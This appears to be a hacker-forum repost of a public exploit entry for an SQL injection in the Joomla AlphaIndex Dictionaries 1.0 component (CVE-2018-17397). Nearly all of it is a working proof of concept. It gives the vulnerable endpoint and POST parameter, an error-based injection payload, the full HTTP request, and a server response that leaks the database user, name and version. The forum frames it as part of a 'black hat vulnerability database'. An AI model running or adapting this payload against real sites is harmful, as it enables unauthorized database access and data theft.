跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# # # # #
# Exploit Title: Joomla! Component AlphaIndex Dictionaries 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://multiplanet.gr/
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/alphaindex-dictionaries/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17397
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_aindexdictionaries&task=getArticlesPreview
# 
# Parameter: letter=[SQL] (POST)
#  
# Payload: " AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
# 
#  POST /alphaindex-dictionaries/index.php?option=com_aindexdictionaries&task=getArticlesPreview HTTP/1.1
#  Host: localhost
#  User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
#  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
#  Accept-Language: en-US,en;q=0.5
#  Accept-Encoding: gzip, deflate
#  Cookie: 4d2a26b1a22184c44838ed58a1427b57=a5ebafd40988be7421846f2e1a496b61
#  Connection: keep-alive
#  Upgrade-Insecure-Requests: 1
#  Content-Type: application/x-www-form-urlencoded
#  Content-Length: 200
#  
#  letter=" AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
#  HTTP/1.1 500 Duplicate entry 'multipla_multi@localhost : multipla_dictionary : 10.2.17-MariaDB' for key 'group_key' SQL=SELECT .............
#  Server: nginx admin
#  Date: Mon, 17 Sep 2018 16:15:28 GMT
#  Content-Type: text/html; charset=utf-8
#  Transfer-Encoding: chunked
#  Connection: keep-alive
#  Cache-Control: no-cache
#  Pragma: no-cache
#  
# # # #

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。